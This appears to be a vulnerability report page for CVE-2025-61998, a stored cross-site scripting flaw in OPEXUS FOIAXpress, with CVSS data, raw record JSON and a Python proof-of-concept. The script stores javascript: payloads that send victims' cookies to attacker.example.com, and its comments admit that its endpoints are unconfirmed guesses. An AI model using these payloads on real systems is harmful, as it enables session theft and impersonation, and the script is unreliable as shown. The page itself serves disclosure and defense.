Security Vulnerability Report
CVE-2025-61998 CVSS 4.3 MEDIUM

CVE-2025-61998

Published: 2025-10-08 00:15:34
Last Modified: 2025-10-22 14:45:10
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to inject JavaScript or other content as a URL within the Technical Support Hyperlink Manager. Injected content is executed in the context of other users when they click the malicious link. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
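CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L
Note: this is the vector of the record's Secondary CVSS 3.1 entry (score 4.3). The Raw JSON Data below also carries a Primary CVSS 3.1 entry, CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N (score 4.8, scope CHANGED), and a CVSS 4.0 entry scored 4.8.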

Configurations (Affected Products)

cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:* - VULNERABLE
OPEXUS FOIAXpress < 11.13.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61998 - OPEXUS FOIAXpress Stored XSS PoC
# Vulnerability: Stored XSS via Technical Support Hyperlink Manager URL field
# Affected: OPEXUS FOIAXpress < 11.13.3.0
#
# Preconditions, per the advisory text on this page: the actor already holds an
# administrative account (PR:H) and the stored link only runs when another user
# clicks it (UI:R). The fix is the upgrade to 11.13.3.0 or later.
#
# NOTE(review): the endpoint paths, form field names and the "JSESSIONID"
# cookie name used below are not confirmed by the advisory or the references
# listed on this page. Treat them as illustrative and verify against a real
# deployment before relying on this script's output.
import requests
from urllib.parse import quote  # NOTE(review): imported but never used below

# Base URL of the instance under test (example.com placeholder).
TARGET_URL = "https://target-foiaxpress.example.com"
ADMIN_SESSION = "<admin_session_cookie>"  # Requires valid admin credentials

# Step 1: Reuse an existing administrator session.
# The script performs no login itself; it only attaches the cookie value above.
session = requests.Session()
session.cookies.set("JSESSIONID", ADMIN_SESSION)

# Step 2: Craft malicious JavaScript URL payload
# The payload uses javascript: protocol to execute arbitrary code
# in the context of any user who clicks the link.
# Defensive reading: the weakness is that the URL field accepts a non-web
# scheme. The usual fix for this class is to allowlist http/https when the
# value is saved and again when it is rendered. Existing hyperlink entries can
# be audited for any other scheme.
# document.cookie exposes only cookies without the HttpOnly attribute, so
# HttpOnly on the session cookie blunts this particular payload.
malicious_payload = (
    'javascript:void(document.location='
    '"https://attacker.example.com/steal?cookie="+document.cookie)'
)

# Alternative payload for credential harvesting
# NOTE(review): defined for illustration only; nothing below ever submits it.
credential_harvester = (
    "javascript:" +
    "var%20f=document.createElement('form');" +
    "f.action='https://attacker.example.com/creds';" +
    "f.method='POST';" +
    "var%20i=document.createElement('input');" +
    "i.name='cookie';i.value=document.cookie;" +
    "f.appendChild(i);document.body.appendChild(f);f.submit();"
)

# Step 3: Submit the malicious URL via Technical Support Hyperlink Manager
# This endpoint is used by admins to configure support hyperlinks
endpoint = f"{TARGET_URL}/foiaxpress/admin/hyperlinkManager"
payload = {
    "hyperlinkName": "Technical Support",
    "hyperlinkUrl": malicious_payload,  # Inject malicious JavaScript URL
    "description": "Click here for technical support"
}
response = session.post(endpoint, data=payload)
# The status code is printed but not checked, so an error response still
# reaches the verification step below.
print(f"[*] Payload submitted - Status: {response.status_code}")

# Step 4: Verify the malicious link is stored
# This is a raw substring match on the response body. A "not found" result
# (for example when the value comes back HTML-encoded, or the path is wrong)
# does not show that an instance is patched. Confirm remediation from the
# installed version (11.13.3.0 or later) instead.
verify_response = session.get(f"{TARGET_URL}/foiaxpress/admin/hyperlinkManager/list")
if malicious_payload in verify_response.text:
    print("[+] XSS payload successfully stored!")
    print("[+] When any user clicks the link, their session cookie will be exfiltrated")
else:
    print("[-] Payload not found in response")

# Step 5: Attacker receives stolen cookies at their server
# Server-side handler (attacker.example.com):
# GET /steal?cookie=<stolen_session_cookie>
# The attacker can now impersonate the victim using the stolen session

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61998", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-08T00:15:34.220", "lastModified": "2025-10-22T14:45:10.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to inject JavaScript or other content as a URL within the Technical Support Hyperlink Manager. Injected content is executed in the context of other users when they click the malicious link. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.13.3.0", "matchCriteriaId": "7077A02D-D6F5-4E4E-B6A4-E2D8AFBF8EAC"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-280-01.json", "source": 
"9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-61998", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}